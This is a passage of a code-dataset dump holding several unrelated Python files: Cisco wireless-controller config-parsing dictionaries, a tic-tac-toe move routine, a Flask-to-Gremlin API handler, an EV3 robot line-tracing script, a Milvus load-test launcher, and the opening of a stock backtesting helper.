'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_psk802_11r',\n 'PMF-1X(802.11w)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_1x802_11w',\n 'PMF-PSK(802.11w)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_psk802_11w',\n 'OSEN-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_osen_1x',\n 'SUITEB-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb_1x',\n 'SUITEB192-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb192_1x',\n 'FT Reassociation Timeout': 'security_wi_fi_protected_access_wpa_wpa2_ft_reassociation_timeout',\n 'FT Over-The-DS mode': 'security_wi_fi_protected_access_wpa_wpa2_ft_over_the_ds_mode',\n 'GTK Randomization': 'security_wi_fi_protected_access_wpa_wpa2_gtk_randomization',\n 'SKC Cache Support': 'security_wi_fi_protected_access_wpa_wpa2_skc_cache_support',\n 'CCKM TSF Tolerance': 'security_wi_fi_protected_access_wpa_wpa2_cckm_tsf_tolerance',\n 'Wi-Fi Direct policy configured': 'security_wi_fi_direct_policy_configured',\n 'EAP-Passthrough': 'security_eap_passthrough',\n 'CKIP': 'security_ckip',\n 'Web Based Authentication': 'security_web_based_authentication',\n 'Web Authentication Timeout': 'security_web_authentication_timeout',\n 'Web-Passthrough': 'security_web_passthrough',\n 'Mac-auth-server': 'security_mac_auth_server',\n 'Web-portal-server': 'security_web_portal_server',\n 'qrscan-des-key': 'security_qrscan_des_key',\n 'Conditional Web Redirect': 'security_conditional_web_redirect',\n 'Splash-Page Web Redirect': 'security_splash_page_web_redirect',\n 'Auto Anchor': 'security_auto_anchor',\n 'FlexConnect Local Switching': 'security_flexconnect_local_switching',\n 'FlexConnect Central Association': 'security_flexconnect_central_association',\n 'flexconnect Central Dhcp Flag': 'security_flexconnect_central_dhcp_flag',\n 'flexconnect nat-pat Flag': 'security_flexconnect_nat_pat_flag',\n 'flexconnect Dns Override Flag': 'security_flexconnect_dns_override_flag',\n 'flexconnect PPPoE pass-through': 'security_flexconnect_pppoe_pass_through',\n 'flexconnect local-switching IP-source-guar': 'security_flexconnect_local_switching_ip_source_guar',\n 'FlexConnect Vlan based Central Switching': 'security_flexconnect_vlan_based_central_switching',\n 'FlexConnect Local Authentication': 'security_flexconnect_local_authentication',\n 'FlexConnect Learn IP Address': 'security_flexconnect_learn_ip_address',\n 'Client MFP': 'security_client_mfp',\n 'PMF': 'security_pmf',\n 'PMF Association Comeback Time': 'security_pmf_association_comeback_time',\n 'PMF SA Query RetryTimeout': 'security_pmf_sa_query_retrytimeout',\n 'Tkip MIC Countermeasure Hold-down Timer': 'security_tkip_mic_countermeasure_hold_down_timer',\n 'Eap-params': 'security_eap_params',\n 'AVC Visibilty': 'avc_visibility',\n 'AVC Profile Name': 'avc_profile_name',\n 'Flex Avc Profile Name': 'flex_avc_profile_name',\n 'OpenDns Profile Name': 'opendns_profile_name',\n 'OpenDns Wlan Mode': 'opendns_wlan_mode',\n 'Flow Monitor Name': 'flow_monitor_name',\n 'Split Tunnel Configuration': 'split_tunnel_configuration',\n 'Split Tunnel': 'split_tunnel_configuration_split_tunnel',\n 'Call Snooping': 'call_snooping',\n 'Roamed Call Re-Anchor Policy': 'roamed_call_re_anchor_policy',\n 'SIP CAC Fail Send-486-Busy Policy': 'sip_cac_fail_send_486_busy_policy',\n 'SIP CAC Fail Send Dis-Association Policy': 'sip_cac_fail_send_dis_association_policy',\n 'KTS based CAC Policy': 'kts_based_cac_policy',\n 'Assisted Roaming Prediction Optimization': 'assisted_roaming_prediction_optimization',\n '802.11k Neighbor List': 'd_802_11k_neighbor_list',\n '802.11k Neighbor List Dual Band': 'd_802_11k_neighbor_list_dual_band',\n '802.11v Directed Multicast Service': 'd_802_11v_directed_multicast_service',\n '802.11v BSS Max Idle Service': 'd_802_11v_bss_max_idle_service',\n '802.11v BSS Transition Service': 'd_802_11v_bss_transition_service',\n '802.11v BSS Transition Disassoc Imminent': 'd_802_11v_bss_transition_disassoc_imminent',\n '802.11v BSS Transition Disassoc Timer': 'd_802_11v_bss_transition_disassoc_timer',\n '802.11v BSS Transition OpRoam Disassoc Timer': 'd_802_11v_bss_transition_oproam_disassoc_timer',\n 'DMS DB is empty': 'dms_db_is_empty',\n 'Band Select': 'band_select',\n 'Load Balancing': 'load_balancing',\n 'Multicast Buffer': 'multicast_buffer',\n 'Universal Ap Admin': 'universal_ap_admin',\n 'Broadcast Tagging': 'broadcast_tagging',\n 'PRP': 'prp',\n 'Mobility Anchor List': 'mobility_anchor_list',\n '802.11u': 'd_802_11u',\n 'MSAP Services': 'msap_services',\n 'Local Policy': 'local_policy',\n 'Priority Policy Name': 'priority__policy_name',\n 'Lync State': 'lync_state',\n 'Audio QoS Policy': 'audio_qos_policy',\n 'Video QoS Policy': 'video_qos_policy',\n 'App-Share QoS Policy': 'app_share_qos_policy',\n 'File Transfer QoS Policy': 'file_transfer_qos_policy',\n 'QoS Fastlane Status': 'qos_fastlane_status',\n 'Selective Reanchoring Status': 'selective_reanchoring_status',\n 'Lobby Admin Access': 'lobby_admin_access',\n 'Fabric status': 'fabric_status',\n 'Vnid Name': 'vnid_name',\n 'Vnid': 'vnid',\n 'Applied SGT Tag': 'applied_sgt_tag',\n 'Peer Ip Address': 'peer_ip_address',\n 'Flex Acl Name': 'flex_acl_name',\n 'Flex Avc Policy Name': 'flex_avc_policy_name',\n 'U3-Interface': 'u3_interface',\n 'U3-Reporting Interval': 'u3_reporting_interval'\n}\n\ninterface_config_parsing_dict = {\n 'Interface Configuration': 'interface_configuration',\n 'Interface Name': 'interface_name',\n 'MAC Address': 'mac_address',\n 'IP Address': 'ip_address',\n 'IP Netmask': 'ip_netmask',\n 'IP Gateway': 'ip_gateway',\n 'External NAT IP State': 'external_nat_ip_state',\n 'External NAT IP Address': 'external_nat_ip_address',\n 'Link Local IPv6 Address': 'link_local_ipv6_address',\n 'STATE': 'state_link_local_ipv6',\n 'Primary IPv6 Address': 'ipv6_address',\n 'STATE1': 'state_ipv6',\n 'Primary IPv6 Gateway': 'ipv6_gateway',\n 'Primary IPv6 Gateway Mac Address': 'ipv6_gateway_mac_address',\n 'IPv6 Address': 'ipv6_address',\n 'IPv6 Gateway': 'ipv6_gateway',\n 'IPv6 Gateway Mac Address': 'ipv6_gateway_mac_address',\n 'STATE2': 'state_ipv6_gateway',\n 'NAS-Identifier': 'nas_identifier',\n 'VLAN': 'vlan',\n 'Quarantine-vlan': 'quarantine_vlan',\n 'Active Physical Port': 'active_physical_port',\n 'Primary Physical Port': 'primary_physical_port',\n 'Backup Physical Port': 'backup_physical_port',\n 'DHCP Proxy Mode': 'dhcp_proxy_mode',\n 'Primary DHCP Server': 'primary_dhcp_server',\n 'Secondary DHCP Server': 'secondary_dhcp_server',\n 'DHCP Option 82': 'dhcp_option_82',\n 'DHCP Option 82 bridge mode insertion': 'dhcp_option_82_bridge_mode_insertion',\n 'IPv4 ACL': 'ipv4_acl',\n 'URL ACL': 'url_acl',\n 'IPv6 ACL': 'ipv6_acl',\n 'URL ACL1': 'url_acl1',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'AP Manager': 'ap_manager',\n 'Guest Interface': 'guest_interface',\n '3G VLAN': 'd_3g_vlan',\n 'L2 Multicast': 'l2_multicast',\n 'SLAAC': 'slaac',\n 'DHCP Protocol': 'dhcp_protocol',\n 'Speed': 'speed',\n 'Duplex': 'duplex',\n 'Auto Negotiation': 'auto_negotiation',\n 'Link Status': 'link_status',\n 'Virtual DNS Host Name': 'virtual_dns_host_name',\n 'Remote ID format': 'remote_id_format',\n 'Link Select Suboption': 'link_select_suboption',\n 'Relay Src Intf': 'relay_src_intf',\n 'VPN Select Suboption': 'vpn_select_suboption',\n}\n\ninterface_group_parsing_dict = {\n 'Interface Group Name': 'interface_group_name',\n 'Quarantine': 'quarantine',\n 'Number of Wlans using the Interface Group': 'number_of_wlans_using_the_interface_group',\n 'Number of AP Groups using the Interface Group': 'number_of_ap_groups_using_the_interface_group',\n 'Number of Interfaces Contained': 'number_of_interfaces_contained',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'Failure-Detect Mode': 'failure_detect_mode',\n 'Interface Group Description': 'interface_group_description',\n}\n\nswitch_config_parsing_dict = {\n '802.3x Flow Control Mode': 'd_802_3x_flow_control_mode',\n 'FIPS prerequisite features': 'fips_prerequisite_features',\n 'WLANCC prerequisite features': 'wlancc_prerequisite_features',\n 'UCAPL prerequisite features': 'ucapl_prerequisite_features',\n 'Last login information display': 'last_login_information_display',\n 'DTLS WLC MIC': 'dtls_wlc_mic',\n 'secret obfuscation': 'secret_obfuscation',\n 'Strong Password Check Features': 'strong_password_check_features',\n 'case-check': 'strong_password_check_features_case_check',\n 'consecutive-check': 'strong_password_check_features_consecutive_check',\n 'default-check': 'strong_password_check_features_default_check',\n 'username-check': 'strong_password_check_features_username_check',\n 'position-check': 'strong_password_check_features_position_check',\n 'case-digit-check': 'strong_password_check_features_case_digit_check',\n 'Min. Password length': 'strong_password_check_features_min__password_length',\n 'Min. Upper case chars': 'strong_password_check_features_min__upper_case_chars',\n 'Min. Lower case chars': 'strong_password_check_features_min__lower_case_chars',\n 'Min. Digits chars': 'strong_password_check_features_min__digits_chars',\n 'Min. Special chars': 'strong_password_check_features_min__special_chars',\n 'Mgmt User': 'mgmt_user',\n 'Password Lifetime [days]': 'mgmt_user_password_lifetime_days',\n 'Password Lockout': 'mgmt_user_password_lockout',\n 'Lockout Attempts': 'mgmt_user_lockout_attempts',\n 'Lockout Timeout [mins]': 'mgmt_user_lockout_timeout_mins',\n 'SNMPv3 User': 'snmpv3_user',\n 'Password Lifetime [days]1': 'snmpv3_user_password_lifetime_days',\n 'Password Lockout1': 'snmpv3_user_password_lockout',\n 'Lockout Attempts1': 'snmpv3_user_lockout_attempts',\n 'Lockout Timeout [mins]1': 'snmpv3_user_lockout_timeout_mins',\n}\n\nmobility_config_parsing_dict = {\n 'Mobility Protocol Port': 'mobility_protocol_port',\n 'Default Mobility Domain': 'default_mobility_domain',\n 'Multicast Mode': 'multicast_mode',\n 'Mobility Domain ID for 802.11r': 'mobility_domain_id_for_802_11r',\n 'Mobility Keepalive Interval': 'mobility_keepalive_interval',\n 'Mobility Keepalive Count': 'mobility_keepalive_count',\n 'Mobility Group Members Configured': 'mobility_group_members_configured',\n 'Mobility Control Message DSCP Value': 'mobility_control_message_dscp_value',\n}\n\nrf_profile_parsing_dict = {\n 'RF Profile name': 'rf_profile_name',\n 'Description': 'description',\n 'AP Group Name': 'ap_group_name',\n 'Radio policy': 'radio_policy',\n '11n-client-only': 'd_11n_client_only',\n 'Transmit Power Threshold v1': 'transmit_power_threshold_v1',\n 'Transmit Power Threshold v2': 'transmit_power_threshold_v2',\n 'Min Transmit Power': 'min_transmit_power',\n 'Max Transmit Power': 'max_transmit_power',\n '802.11b/g Operational Rates': 'd_802_11b_g_operational_rates',\n '802.11b/g 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b/g 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b/g 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b/g 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11g 6M Rate': 'd_802_11b_g_operational_rates_802_11g_6m_rate',\n '802.11g 9M Rate': 'd_802_11b_g_operational_rates_802_11g_9m_rate',\n '802.11g 12M Rate': 'd_802_11b_g_operational_rates_802_11g_12m_rate',\n '802.11g 18M Rate': 'd_802_11b_g_operational_rates_802_11g_18m_rate',\n '802.11g 24M Rate': 'd_802_11b_g_operational_rates_802_11g_24m_rate',\n '802.11g 36M Rate': 'd_802_11b_g_operational_rates_802_11g_36m_rate',\n '802.11g 48M Rate': 'd_802_11b_g_operational_rates_802_11g_48m_rate',\n '802.11g 54M Rate': 'd_802_11b_g_operational_rates_802_11g_54m_rate',\n '802.11a Operational Rates': 'd_802_11a_operational_rates',\n '802.11a 6M Rate': 'd_802_11a_operational_rates_802_11a_6m_rate',\n '802.11a 9M Rate': 'd_802_11a_operational_rates_802_11a_9m_rate',\n '802.11a 12M Rate': 'd_802_11a_operational_rates_802_11a_12m_rate',\n '802.11a 18M Rate': 'd_802_11a_operational_rates_802_11a_18m_rate',\n '802.11a 24M Rate': 'd_802_11a_operational_rates_802_11a_24m_rate',\n '802.11a 36M Rate': 'd_802_11a_operational_rates_802_11a_36m_rate',\n '802.11a 48M Rate': 'd_802_11a_operational_rates_802_11a_48m_rate',\n '802.11a 54M Rate': 'd_802_11a_operational_rates_802_11a_54m_rate',\n 'Trap Threshold': 'trap_threshold',\n 'Clients': 'trap_threshold_clients',\n 'Interference': 'trap_threshold_interference',\n 'Noise': 'trap_threshold_noise',\n 'Utilization': 'trap_threshold_utilization',\n 'Multicast Data Rate': 'multicast_data_rate',\n 'Rx Sop Threshold': 'rx_sop_threshold',\n 'Cca Threshold': 'cca_threshold',\n 'Slot Admin State:': 'slot_admin_state',\n 'Client Aware FRA': 'client_aware_fra',\n 'State': 'client_aware_fra_state',\n 'Client Select Utilization Threshold': 'client_aware_fra_client_select_utilization_threshold',\n 'Client Reset Utilization Threshold': 'client_aware_fra_client_reset_utilization_threshold',\n 'Band Select': 'band_select',\n 'Probe Response': 'band_select_probe_response',\n 'Cycle Count': 'band_select_cycle_count',\n 'Cycle Threshold': 'band_select_cycle_threshold',\n 'Expire Suppression': 'band_select_expire_suppression',\n 'Expire Dual Band': 'band_select_expire_dual_band',\n 'Client Rssi': 'band_select_client_rssi',\n 'Client Mid Rssi': 'band_select_client_mid_rssi',\n 'Load Balancing': 'load_balancing',\n 'Denial': 'load_balancing_denial',\n 'Window': 'load_balancing_window',\n 'Coverage Data': 'coverage_data',\n 'Data': 'coverage_data_data',\n 'Voice': 'coverage_data_voice',\n 'Minimum Client Level': 'coverage_data_minimum_client_level',\n 'Exception Level': 'coverage_data_exception_level',\n 'DCA Channel List': 'dca_channel_list',\n 'DCA Bandwidth': 'dca_bandwidth',\n 'DCA Foreign AP Contribution': 'dca_foreign_ap_contribution',\n '802.11n MCS Rates': 'd_802_11n_mcs_rates',\n 'MCS-00 Rate': 'd_802_11n_mcs_rates_mcs_00_rate',\n 'MCS-01 Rate': 'd_802_11n_mcs_rates_mcs_01_rate',\n 'MCS-02 Rate': 'd_802_11n_mcs_rates_mcs_02_rate',\n 'MCS-03 Rate': 'd_802_11n_mcs_rates_mcs_03_rate',\n 'MCS-04 Rate': 'd_802_11n_mcs_rates_mcs_04_rate',\n 'MCS-05 Rate': 'd_802_11n_mcs_rates_mcs_05_rate',\n 'MCS-06 Rate': 'd_802_11n_mcs_rates_mcs_06_rate',\n 'MCS-07 Rate': 'd_802_11n_mcs_rates_mcs_07_rate',\n 'MCS-08 Rate': 'd_802_11n_mcs_rates_mcs_08_rate',\n 'MCS-09 Rate': 'd_802_11n_mcs_rates_mcs_09_rate',\n 'MCS-10 Rate': 'd_802_11n_mcs_rates_mcs_10_rate',\n 'MCS-11 Rate': 'd_802_11n_mcs_rates_mcs_11_rate',\n 'MCS-12 Rate': 'd_802_11n_mcs_rates_mcs_12_rate',\n 'MCS-13 Rate': 'd_802_11n_mcs_rates_mcs_13_rate',\n 'MCS-14 Rate': 'd_802_11n_mcs_rates_mcs_14_rate',\n 'MCS-15 Rate': 'd_802_11n_mcs_rates_mcs_15_rate',\n 'MCS-16 Rate': 'd_802_11n_mcs_rates_mcs_16_rate',\n 'MCS-17 Rate': 'd_802_11n_mcs_rates_mcs_17_rate',\n 'MCS-18 Rate': 'd_802_11n_mcs_rates_mcs_18_rate',\n 'MCS-19 Rate': 'd_802_11n_mcs_rates_mcs_19_rate',\n 'MCS-20 Rate': 'd_802_11n_mcs_rates_mcs_20_rate',\n 'MCS-21 Rate': 'd_802_11n_mcs_rates_mcs_21_rate',\n 'MCS-22 Rate': 'd_802_11n_mcs_rates_mcs_22_rate',\n 'MCS-23 Rate': 'd_802_11n_mcs_rates_mcs_23_rate',\n 'MCS-24 Rate': 'd_802_11n_mcs_rates_mcs_24_rate',\n 'MCS-25 Rate': 'd_802_11n_mcs_rates_mcs_25_rate',\n 'MCS-26 Rate': 'd_802_11n_mcs_rates_mcs_26_rate',\n 'MCS-27 Rate': 'd_802_11n_mcs_rates_mcs_27_rate',\n 'MCS-28 Rate': 'd_802_11n_mcs_rates_mcs_28_rate',\n 'MCS-29 Rate': 'd_802_11n_mcs_rates_mcs_29_rate',\n 'MCS-30 Rate': 'd_802_11n_mcs_rates_mcs_30_rate',\n 'MCS-31 Rate': 'd_802_11n_mcs_rates_mcs_31_rate',\n 'Client Network Preference': 'client_network_preference'\n}\n\nmain_parsing_dict_aireos = {\n 'WLAN Configuration': ssid_config_parsing_dict, # Config section start word from list\n 'Probe request filtering..': advanced_config_parsing_dict,\n 'WLC IPv6 Summary': ipv6_config_parsing_dict,\n 'RADIUS Configuration': radius_config_parsing_dict,\n 'Mobility Configuration': mobility_config_parsing_dict,\n 'Total Number of AP Groups': ap_group_parsing_dict,\n '802.11b CleanAir Configuration': cleanair_24g_parsing_dict,\n '802.11a CleanAir Configuration': cleanair_5g_parsing_dict,\n 'Interface Configuration': interface_config_parsing_dict,\n 'Interface Group Configuration': interface_group_parsing_dict,\n 'Network Information': network_config_parsing_dict,\n 'Switch Configuration': switch_config_parsing_dict,\n 'AP Airewave Director Configuration': ap_rf_parsing_dict,\n 'AP Config': ap_config_parsing_dict,\n 'DHCP Info': dhcp_server_parsing_dict,\n 'Redundancy Information': redundancy_mode_parsing_dict,\n 'System Information': system_info_parsing_dict,\n '802.11a Configuration': band_5_parsing_dict,\n '802.11b Configuration': band_24_parsing_dict,\n 'Number of RF Profiles': rf_profile_parsing_dict,\n 'Airewave Director Configuration': nearby_aps_parsing_dict, # Special case for Nearby APs info\n}\n\n# TESTING functions section\ndef parsing_dict_checker(dict, class_instance):\n logging.debug('Checking parsing dictionary for object type: ' + str(type(class_instance)))\n # To test parsing dictionary with the class instance\n for key in dict.keys():\n try:\n getattr(class_instance, dict[key])\n except:\n if not 'unique_' in str(key) and not 'end_table_string' in dict[key]: #skip unique_keys and table parsing dicts - needed for dict identification and table parsing\n logging.debug('ERROR: '+ str(type(class_instance)) + ' ' + str(key) + ' ' + str(dict[key]))\n\ndef test_parsing_dicts_aireos():\n parsing_dict_checker(ssid_config_parsing_dict, Ssid_Config())\n parsing_dict_checker(ipv6_config_parsing_dict, Ipv6_Config())\n parsing_dict_checker(advanced_config_parsing_dict, Advanced_Config())\n parsing_dict_checker(radius_config_parsing_dict, Radius_Config())\n parsing_dict_checker(rf_profile_parsing_dict, Rf_Profile())\n parsing_dict_checker(interface_config_parsing_dict, Dynamic_Interface())\n parsing_dict_checker(switch_config_parsing_dict, Switch_Config())\n parsing_dict_checker(network_config_parsing_dict, Network_Config())\n parsing_dict_checker(mobility_config_parsing_dict, Mobility_Config())\n parsing_dict_checker(ap_config_parsing_dict, Ap_Config())\n parsing_dict_checker(dhcp_server_parsing_dict, Dhcp_Server())\n parsing_dict_checker(redundancy_mode_parsing_dict, Redundancy_Config())\n parsing_dict_checker(system_info_parsing_dict, System_Config())\n parsing_dict_checker(band_5_parsing_dict, Band5_Config())\n parsing_dict_checker(band_24_parsing_dict, Band24_Config())\n parsing_dict_checker(cleanair_24g_parsing_dict, Cleanair_24G_Config())\n parsing_dict_checker(cleanair_5g_parsing_dict, Cleanair_5G_Config())\n logging.debug('Checked AireOS parsing dictionaries test results for correct parsing')","repo_name":"consulttelecom/cisco-wlc-pythonizer","sub_path":"source/aireos_dicts_classes.py","file_name":"aireos_dicts_classes.py","file_ext":"py","file_size_in_byte":198089,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"661397129","text":"\"\"\"\nTic tac toe question 2 implementation\n\"\"\"\nimport itertools\n\nfrom problems.tic_tac_toe.base import _Board\n\n\nclass BoardQ2(_Board):\n \"\"\"\n Question 2 board implementation\n \"\"\"\n\n def move_comp(self):\n \"\"\"\n Calculates and moves computer\n \"\"\"\n if self.turn < 3:\n self.computer.append(self.get_random_blank())\n return\n\n for move_pair in itertools.chain(itertools.combinations(self.computer, 2), itertools.combinations(self.player, 2)):\n pair_sum_dif = 15 - sum(map(self.board.__getitem__, move_pair))\n if 0 < pair_sum_dif < 10:\n ind = self.board.index(pair_sum_dif)\n if ind not in self.computer and ind not in self.player:\n self.computer.append(ind)\n return\n self.computer.append(self.get_random_blank())\n","repo_name":"zeerorg/AI-py","sub_path":"problems/tic_tac_toe/ques2.py","file_name":"ques2.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73666987068","text":"from flask.ext.restful import Resource\nfrom flask import request\nimport requests\nfrom requests.exceptions import ConnectionError\n\n\nclass Add(Resource):\n def post(self):\n r = request\n user_id = r.form['user_id']\n dub_id = r.form['dub_id']\n emo_id = r.form['emo_id']\n\n db_proxy = DbProxy()\n db_proxy.add(\"e = g.addEdge('belongs', g.V(%s), g.V(%s)); \" % (user_id, dub_id))\n db_proxy.add(\"e.setProperty('emo_id', %s)\" % emo_id)\n try:\n response = db_proxy.send()\n except ConnectionError as e:\n return 500, \"db abruption\"\n if response.status_code == 500:\n return 400, response.json()['message']\n return response.status_code, \"ok\"\n\n\nclass Singleton(type):\n def __init__(cls, name, bases, dict):\n super(Singleton, cls).__init__(name, bases, dict)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass DbProxy(object):\n __metaclass__ = Singleton\n\n def __init__(self):\n self.script = \"\"\n\n def add(self, line):\n self.script += line\n\n def send(self):\n self.script = '{\"gremlin\": \"%s\"}' % self.script\n try:\n response = requests.post('http://ec2-52-50-189-192.eu-west-1.compute.amazonaws.com:8182', data=self.script)\n except ConnectionError as e:\n raise e\n self.script = ''\n return response\n","repo_name":"gunkow/smash","sub_path":"app/api/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2292747696","text":"#!/usr/bin/env pybricks-micropython\nimport sys\nsys.path.append(\"./\")\n\n# pybricksのreferenceはここ: https://docs.pybricks.com/en/stable/index.html\nfrom pybricks.hubs import EV3Brick\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\n InfraredSensor, UltrasonicSensor, GyroSensor)\nfrom pybricks.parameters import Port, Stop, Direction, Button, Color\nfrom pybricks.tools import wait, StopWatch, DataLog\nfrom pybricks.robotics import DriveBase\nfrom pybricks.media.ev3dev import SoundFile, ImageFile\nfrom color import RGBColor\n\n# EV3の固有デバイス初期化\nleftMotor = Motor(Port.C)\nrightMotor = Motor(Port.B)\nsonicSensor = UltrasonicSensor(Port.S4)\n\nclass LineTraceCar():\n \"\"\"\n ライントレースと車庫入れを行うクラス\n \"\"\"\n SPEED = [240, 80] # 通常\n SPEED2 = [120, 60] # 低速\n SPEED3 = [240, 180] # 高速\n\n FLAG_NORMAL = 0\n FLAG_GREEN = 1\n FLAG_BLUE = 2\n\n def waitStart(self, dist_min_mm, dist_max_mm):\n \"\"\"dist_min から dist_maxの間に物体を検知し続けている間無限ループする\"\"\"\n while True:\n if not self.__isDetectObject(dist_min_mm, dist_max_mm):\n break\n # end of while\n\n def trace(self):\n \"\"\"ライントレースのメイン処理\"\"\"\n # RGBColorクラスの初期化\n rgbColor = RGBColor()\n self.__initMotor()\n\n flag = self.FLAG_NORMAL\n speed = self.SPEED\n\n # ラインをトレースして走る\n while True:\n # 色の取得と判定\n gotColor = rgbColor.getColor()\n\n if gotColor is Color.BLACK:\n if flag == self.FLAG_GREEN:\n # 緑の後に黒を検出したら90°コーナーを曲がる\n self.__turnLastCurve()\n flag = self.FLAG_NORMAL\n # あとは直線なので、高速度設定\n speed = self.SPEED3\n elif flag == self.FLAG_BLUE:\n # 青から黒を検出したら、車庫入れのために方向を整えたいので速度を落とす\n speed = self.SPEED2\n self.__run(speed[1], speed[0])\n flag = self.FLAG_NORMAL\n\n else:\n # 右旋回\n self.__run(speed[1], speed[0])\n\n elif gotColor is Color.WHITE: # 白\n # 左回転\n \tself.__run(speed[0], speed[1])\n\n elif gotColor is Color.GREEN: # 緑\n self.__run(speed[1], speed[0])\n flag = self.FLAG_GREEN\n\n elif gotColor is Color.BLUE: # 青\n self.__run(speed[1], speed[0])\n flag = self.FLAG_BLUE\n\n elif gotColor is Color.YELLOW:\n break\n\n else:\n # 白以外のその他の色も右回転\n \tself.__run(speed[1], speed[0])\n # end of while\n\n # モーターを停止\n leftMotor.stop()\n rightMotor.stop()\n print(\"trace MotorStop\")\n\n def garageIn(self):\n \"\"\"\n 車庫入れの実施\n \"\"\"\n # 少し直進\n self.__initMotor()\n \n speed = self.__calcDegree(10)\n leftMotor.run_angle(speed, speed, wait=False)\n rightMotor.run_angle(speed, speed, wait=True)\n\n # 90度左旋回\n self.__turn(-90)\n\n # 20cm前進\n speed = self.__calcDegree(20)\n leftMotor.run_angle(speed, speed, wait=False)\n rightMotor.run_angle(speed, speed, wait=True)\n\n leftMotor.brake()\n rightMotor.brake()\n print(\"garageIn() MotorStop\")\n\n def __initMotor(self):\n leftMotor.brake()\n rightMotor.brake()\n\n leftMotor.reset_angle(0)\n rightMotor.reset_angle(0)\n\n def __run(self, l_motor_speed, r_motor_speed):\n \"\"\"\n モーターを回す。引数は左右モーターの角速度(deg/s)\n \"\"\"\n if l_motor_speed == 0:\n # TODO: hold()でもいいかも\n leftMotor.stop()\n else:\n leftMotor.run(l_motor_speed)\n\n if r_motor_speed == 0:\n rightMotor.stop()\n else:\n rightMotor.run(r_motor_speed)\n\n def __turnLastCurve(self):\n \"\"\"緑から黒を検出したらよばれる、90度カーブを曲がるための制御関数\"\"\"\n # 4cm直進\n speed = self.__calcDegree(4)\n leftMotor.run_angle(speed * 2, speed, wait=False)\n rightMotor.run_angle(speed * 2, speed, wait=True)\n\n self.__turn(90)\n\n def __calcDegree(self, run_distance_cm):\n \"\"\"走行距離を入力すると、必要な角度を計算する\"\"\"\n # 走行距離yは y = 5.6(cm タイヤ直径) * 3.14 * deg / 360 で計算できるので、これを変形してdegを計算する\n return run_distance_cm * 20.47\n\n def __turn(self, deg):\n \"\"\"指定された角度だけ曲がる。+なら右旋回、-の角度なら左旋回する\"\"\"\n # 1sで指定された角度だけ信地旋回するために必要な速度\n # 機体のトレッド=回転半径が約10cmなので、20 * 3.14 * deg / 360がタイヤの移動距離。\n # これに走行距離yを計算する式y = 5.6(cm タイヤ直径) * 3.14 * deg_s / 360 を適用すると、20/5.6 * deg\n\n #speed = 3.6 * deg\n speed = 4.3 * deg # 速度が上がると曲がりきれないようなので係数をあげる\n\n if deg > 0:\n # +なら右旋回=左モーターを回す\n leftMotor.run_angle(speed, speed, wait=True)\n rightMotor.hold()\n\n else:\n # -なら左旋回=右モーターを回す degが負値なので−する\n leftMotor.hold()\n rightMotor.run_angle(-speed, -speed, wait=True)\n\n def __isDetectObject(self, dist_min, dist_max):\n \"\"\"指定された範囲に物体を検出したらTrueを返す\"\"\"\n dist = sonicSensor.distance()\n if (dist_min < dist and dist < dist_max):\n return True\n return False\n\nif __name__ == \"__main__\":\n car = LineTraceCar()\n\n # start処理\n car.waitStart(50, 200)\n\n # ライントレース開始\n car.trace()\n\n # 駐車する\n car.garageIn()\n","repo_name":"dnaka/EV3_sample","sub_path":"step4_main.py","file_name":"step4_main.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18801406817","text":"from pymilvus import DataType\nfrom milvus_benchmark.runners.locust_user import locust_executor\nfrom milvus_benchmark.client import MilvusClient\n\n\nif __name__ == \"__main__\":\n connection_type = \"single\"\n host = \"127.0.0.1\"\n port = 19530\n collection_name = \"sift_1m_128_l2\"\n run_params = {\"tasks\": {\"insert\": 1}, \"clients_num\": 10, \"spawn_rate\": 2, \"during_time\": 3600}\n dim = 128\n m = MilvusClient(host=host, port=port, collection_name=collection_name)\n m.create_collection(dim, data_type=DataType.FLOAT_VECTOR, auto_id=False, other_fields=None)\n locust_executor(host, port, collection_name, run_params=run_params)\n","repo_name":"milvus-io/milvus","sub_path":"tests/benchmark/milvus_benchmark/tests/locust_user_test.py","file_name":"locust_user_test.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":24190,"dataset":"github-code","pt":"6"} +{"seq_id":"70078688508","text":"import yfinance as module_yf\nimport pandas as module_pd\nimport numpy as module_np\nimport collections as module_cl\n\n\n\ndef function_tsig(\n list_indicator\n):\n\n vector_indicator = module_np.array(\n object = list_indicator\n )\n\n vector_non_neg = module_np.maximum(\n vector_indicator,\n 0\n )\n\n vector_sign = module_np.sign(\n vector_non_neg\n )\n\n list_sign = list(\n vector_sign\n )\n\n return list_sign\n\n\ndef function_list_shift(\n list_input,\n float_fill\n):\n\n deque_input = module_cl.deque(\n iterable = list_input\n )\n\n deque_input.pop()\n\n deque_input.appendleft(\n float_fill\n )\n\n return list(\n deque_input\n )\n\ndef function_action(\n list_sign\n):\n\n list_shift = function_list_shift(\n list_input = list_sign,\n float_fill = 0\n )\n\n list_output = list(\n module_np.array(\n list_sign\n ) - \n module_np.array(\n list_shift\n )\n )\n\n return list_output\n\n\ndef function_backtester(\n list_prices,\n 